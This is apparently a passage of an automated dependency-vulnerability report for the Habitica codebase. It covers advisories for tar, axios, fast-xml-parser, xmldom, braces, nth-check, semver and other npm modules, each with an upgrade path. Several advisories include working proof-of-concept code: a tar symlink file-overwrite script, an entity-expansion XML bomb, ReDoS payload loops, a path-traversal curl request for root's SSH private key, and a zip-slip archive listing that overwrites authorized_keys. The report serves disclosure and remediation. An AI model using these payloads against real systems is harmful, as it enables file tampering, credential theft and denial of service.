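} catch (e) {
  result = e.constructor.name;
}
console.log(result); // 'TypeError'
```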
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
- Freeze the prototype: use Object.freeze(Object.prototype).
- Require schema validation of JSON input.
- Avoid using unsafe recursive merge functions.
- Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
- As a best practice, use Map instead of Object.
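A minimal sketch of the mitigations listed above (freezing the prototype, null-prototype objects, and Map):

```javascript
// 1. Freeze the prototype: pollution attempts become no-ops
//    (or throw in strict mode).
Object.freeze(Object.prototype);
try { Object.prototype.polluted = true; } catch (e) { /* strict mode throws */ }
console.log({}.polluted); // undefined

// 2. Null-prototype objects have no chain to pollute:
const safe = Object.create(null);
safe['__proto__'] = 'just data'; // stored as an ordinary own property
console.log(Object.getPrototypeOf(safe)); // null

// 3. Map keys never touch the prototype:
const m = new Map();
m.set('__proto__', 'just data');
console.log(m.get('__proto__')); // just data
```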
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
There is no fixed version for xmldom.
References
high severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1
Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar implementation for Node.js.
Affected versions of this package are vulnerable to Directory Traversal via the extract() function. An attacker can read or write files outside the intended extraction directory by causing the application to extract a malicious archive containing a chain of symlinks leading to a hardlink, which bypasses path validation checks.
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade tar to version 7.5.8 or higher.
References
high severity (new)
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4
Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the Http2Sessions.getSession() function in the HTTP/2 session cleanup. An attacker can cause the client process to crash by establishing multiple concurrent HTTP/2 sessions and then closing all sessions simultaneously from a malicious server.
Remediation
Upgrade axios to version 1.13.2 or higher.
References
high severity (new)
- Vulnerable module: fast-xml-parser
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-svgo@7.1.0 › is-svg@4.4.0 › fast-xml-parser@4.5.6
Overview
fast-xml-parser is a library to validate, parse, and build XML without C/C++-based dependencies.
Affected versions of this package are vulnerable to Improper Validation of Specified Quantity in Input in the DocTypeReader component when the maxEntityCount or maxEntitySize configuration options are explicitly set to 0. Due to JavaScript's falsy evaluation, the intended limits are bypassed. An attacker can cause unbounded entity expansion and exhaust server memory by supplying crafted XML input containing numerous large entities.
Note:
This is only exploitable if the application is configured with processEntities enabled and either maxEntityCount or maxEntitySize set to 0.
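The falsy-evaluation root cause is independent of fast-xml-parser and can be shown in isolation; DEFAULT_MAX below is an illustrative stand-in for a library's internal default:

```javascript
// The root cause in isolation: `||` treats a configured 0 as "unset".
const DEFAULT_MAX = 1024;   // illustrative internal default
const configured = 0;       // developer intends "no entities allowed"

const limitBuggy = configured || DEFAULT_MAX; // 1024 - the limit is silently lifted
const limitFixed = configured ?? DEFAULT_MAX; // 0    - ?? only falls back on null/undefined

console.log(limitBuggy, limitFixed); // 1024 0
```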
PoC
const { XMLParser } = require("fast-xml-parser");
// Developer intends: "no entities allowed at all"
const parser = new XMLParser({
processEntities: {
enabled: true,
maxEntityCount: 0, // should mean "zero entities allowed"
maxEntitySize: 0 // should mean "zero-length entities only"
}
});
// Generate XML with many large entities
let entities = "";
for (let i = 0; i < 1000; i++) {
entities += `<!ENTITY e${i} "${"A".repeat(100000)}">`;
}
const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
${entities}
]>
<foo>&e0;</foo>`;
// This should throw "Entity count exceeds maximum" but does not
try {
const result = parser.parse(xml);
console.log("VULNERABLE: parsed without error, entities bypassed limits");
} catch (e) {
console.log("SAFE:", e.message);
}
// Control test: setting maxEntityCount to 1 correctly blocks
const safeParser = new XMLParser({
processEntities: {
enabled: true,
maxEntityCount: 1,
maxEntitySize: 100
}
});
try {
safeParser.parse(xml);
console.log("ERROR: should have thrown");
} catch (e) {
console.log("CONTROL:", e.message); // "Entity count (2) exceeds maximum allowed (1)"
}
Remediation
Upgrade fast-xml-parser to version 5.5.7 or higher.
References
high severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1
Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar implementation for Node.js.
Affected versions of this package are vulnerable to Symlink Attack exploitable via stripAbsolutePath(), used by the Unpack class. An attacker can overwrite arbitrary files outside the intended extraction directory by including a hardlink whose linkpath uses a drive-relative path such as C:../target.txt in a malicious tar.
Details
See the Directory Traversal explanation under the first tar advisory above.
Remediation
Upgrade tar to version 7.5.10 or higher.
References
high severity (new)
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1
Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar implementation for Node.js.
Affected versions of this package are vulnerable to Symlink Attack via tar.x() extraction, which allows an attacker to overwrite arbitrary files outside the intended extraction directory with a drive-relative symlink target such as C:../../../target.txt.
PoC
const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')
const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')
fs.writeFileSync(target, 'ORIGINAL\n')
const b = Buffer.alloc(1536)
new Header({
path: 'a/b/l',
type: 'SymbolicLink',
linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)
x({ cwd, file: tarFile }).then(() => {
fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
process.stdout.write(fs.readFileSync(target, 'utf8'))
})
Details
See the Directory Traversal explanation under the first tar advisory above.
Remediation
Upgrade tar to version 7.5.11 or higher.
References
high severity (new)
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is a pure JavaScript, W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to XML Injection via the XMLSerializer() function. An attacker can manipulate the structure and integrity of generated XML documents by injecting attacker-controlled markup containing the CDATA terminator ]]> through CDATA section content, which is not properly validated or sanitized during serialization. This can result in unauthorized XML elements or attributes being inserted, potentially leading to business logic manipulation or privilege escalation in downstream consumers.
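The CDATA-escape primitive itself can be shown without xmldom; this sketch uses plain strings only, to demonstrate how attacker text containing ]]> terminates the section early so that the remainder is interpreted as markup by any downstream XML parser:

```javascript
// Illustration only (plain string concatenation, no xmldom involved):
// attacker-controlled text containing the CDATA terminator "]]>" closes
// the CDATA section early; the rest is then parsed as live markup.
const attackerText = 'harmless]]><admin>true</admin><x><![CDATA[';
const serialized = '<user><![CDATA[' + attackerText + ']]></user>';
console.log(serialized);
// <user><![CDATA[harmless]]><admin>true</admin><x><![CDATA[]]></user>
```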
Remediation
There is no fixed version for xmldom.
References
high severity
- Vulnerable module: braces
- Introduced through: gulp@4.0.2
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › braces@2.3.2
Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › braces@2.3.2
Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › braces@2.3.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › braces@2.3.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › braces@2.3.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › braces@2.3.2
Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › braces@2.3.2
Overview
braces is a Bash-like brace expansion library, implemented in JavaScript.
Affected versions of this package are vulnerable to Excessive Platform Resource Consumption within a Loop due to improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.
PoC
const { braces } = require('micromatch');
console.log("Executing payloads...");
const maxRepeats = 10;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
Remediation
Upgrade braces to version 3.0.3 or higher.
References
high severity
- Vulnerable module: markdown-it
- Introduced through: apidoc@0.54.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › markdown-it@12.3.2
Overview
markdown-it is a modern pluggable markdown parser.
Affected versions of this package are vulnerable to an Infinite Loop in the linkify inline rule when processing malformed input.
Remediation
Upgrade markdown-it to version 13.0.2 or higher.
References
high severity
- Vulnerable module: nth-check
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-svgo@7.1.0 › svgo@1.3.2 › css-select@2.1.0 › nth-check@1.0.2
Remediation: Upgrade to gulp-imagemin@8.0.0.
Overview
nth-check parses and compiles CSS nth-checks (for example, the argument of an :nth-child() selector).
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when parsing crafted invalid CSS nth-checks, due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? in RE_NTH_ELEMENT with quantified overlapping adjacency.
PoC
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A: the string must start with the letter 'A'.
- (B|C+)+: the 'A' must be followed by either the letter 'B' or one or more occurrences of the letter 'C' (the inner + matches one or more times). The outer + states that we can look for one or more matches of this whole group.
- D: finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing a 30-character string takes around 52 ms. But when given an invalid string, the test takes nearly two seconds to complete, over ten times as long as for a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
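As a closing illustration, the example pattern from the walkthrough can be rewritten without the nested quantifier, which removes the ambiguity the backtracking feeds on. (B|C+)+ and [BC]+ accept exactly the same strings, but [BC]+ gives the engine only one way to consume each character:

```javascript
// Linear-time rewrite of /A(B|C+)+D/: same language, no ambiguity,
// so no catastrophic backtracking on a failing input.
const linear = /A[BC]+D/;
const evil = 'A' + 'C'.repeat(30) + 'X'; // pathological input for /A(B|C+)+D/

console.log(linear.test('ABCCCCD')); // true
console.log(linear.test(evil));      // false, returned immediately
```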
Remediation
Upgrade nth-check to version 2.0.1 or higher.
References
high severity
- Vulnerable module: semver
- Introduced through: apidoc@0.54.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › nodemon@2.0.22 › simple-update-notifier@1.1.0 › semver@7.0.0
Remediation: Upgrade to apidoc@1.1.0.
Overview
semver is a semantic version parser used by npm.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
PoC
const semver = require('semver')
const lengths_2 = [2000, 4000, 8000, 16000, 32000, 64000, 128000]
console.log("\n[+] Valid range - Test payloads")
for (let i = 0; i < lengths_2.length; i++) {
const value = '>=1.2.3' + ' '.repeat(lengths_2[i]) + '<1.3.0';
const start = Date.now()
semver.validRange(value)
// semver.minVersion(value)
// semver.maxSatisfying(["1.2.3"], value)
// semver.minSatisfying(["1.2.3"], value)
// new semver.Range(value, {})
const end = Date.now();
console.log('length=%d, time=%d ms', value.length, end - start);
}
Details
See the ReDoS explanation under the nth-check advisory above.
Remediation
Upgrade semver to version 5.7.2, 6.3.1, 7.5.2 or higher.
References
high severity
- Vulnerable module: semver-regex
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
Overview
semver-regex is a regular expression for matching semver versions.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). This can occur when running the regex on untrusted user input in a server context.
Details
See the ReDoS explanation under the nth-check advisory above.
Remediation
Upgrade semver-regex to version 4.0.1, 3.1.3 or higher.
References
high severity
- Vulnerable module: semver-regex
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
Overview
semver-regex is a regular expression for matching semver versions.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The semverRegex function contains a regex that allows exponential backtracking.
PoC
import semverRegex from 'semver-regex';

// The following payload would take excessive CPU cycles
const payload = '0.0.0-0' + '.-------'.repeat(100000) + '@';
semverRegex().test(payload);
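Independent of any library fix, a caller can blunt this class of payload by bounding input length before matching, since real semver strings are short and ReDoS payloads are long. A minimal sketch; safeVersionTest, MAX_VERSION_LENGTH and the stand-in pattern are illustrative, not part of semver-regex:

```javascript
// Mitigation sketch (hypothetical helper, not the semver-regex API):
// reject oversized input before any regex ever runs.
const MAX_VERSION_LENGTH = 256; // assumption: legitimate versions are short

function safeVersionTest(input, regex) {
  if (typeof input !== 'string' || input.length > MAX_VERSION_LENGTH) {
    return false;
  }
  return regex.test(input);
}

// Stand-in pattern for illustration only (not the semver-regex pattern).
const simpleSemver = /^\d+\.\d+\.\d+$/;
console.log(safeVersionTest('1.2.3', simpleSemver));            // true
console.log(safeVersionTest('x'.repeat(100000), simpleSemver)); // false, rejected by length
```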
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A: The string must start with the letter 'A'.
- (B|C+)+: The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
- D: Finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing a 30-character string takes around 52 ms. But when given an invalid string, the test takes nearly two seconds to complete, roughly 35 times as long as for a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx101 debugger to see that the engine takes a total of 38 steps before it can determine that the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the regex engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this to make the service excessively consume CPU, resulting in a Denial of Service.
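The growth shown in the table above can be reproduced with a short timing script. Exact times and step counts vary by engine, but each additional C roughly doubles the work:

```javascript
// Time the backtracking-prone pattern against invalid strings of growing length.
const pattern = /A(B|C+)+D/;

for (const n of [16, 18, 20, 22]) {
  const input = 'A' + 'C'.repeat(n) + 'X'; // invalid: ends with X, not D
  const start = process.hrtime.bigint();
  pattern.test(input);
  const ms = Number(process.hrtime.bigint() - start) / 1e6;
  console.log(`${n} C's: ${ms.toFixed(2)} ms`);
}
```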
Remediation
Upgrade semver-regex to version 3.1.3 or higher.
References
high severity
- Vulnerable module: trim-newlines
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › logalot@2.1.0 › squeak@1.3.0 › lpad-align@1.1.2 › meow@3.7.0 › trim-newlines@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › logalot@2.1.0 › squeak@1.3.0 › lpad-align@1.1.2 › meow@3.7.0 › trim-newlines@1.0.0
Overview
trim-newlines is a package that trims newlines from the start and/or end of a string.
Affected versions of this package are vulnerable to Denial of Service (DoS) via the end() method.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.
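For the trim-newlines case specifically, trailing newlines can be stripped without any regular expression at all. A sketch of a linear-time alternative; trimEndNewlines is a hypothetical helper, not the trim-newlines API:

```javascript
// Regex-free sketch: scan backwards over trailing newline characters and
// slice once, which runs in linear time regardless of the input's shape.
function trimEndNewlines(str) {
  let end = str.length;
  while (end > 0 && (str[end - 1] === '\n' || str[end - 1] === '\r')) {
    end -= 1;
  }
  return str.slice(0, end);
}

console.log(JSON.stringify(trimEndNewlines('abc\r\n\n'))); // "abc"
```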
Remediation
Upgrade trim-newlines to version 3.0.1, 4.0.1 or higher.
References
high severity
- Vulnerable module: unset-value
- Introduced through: gulp@4.0.2
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
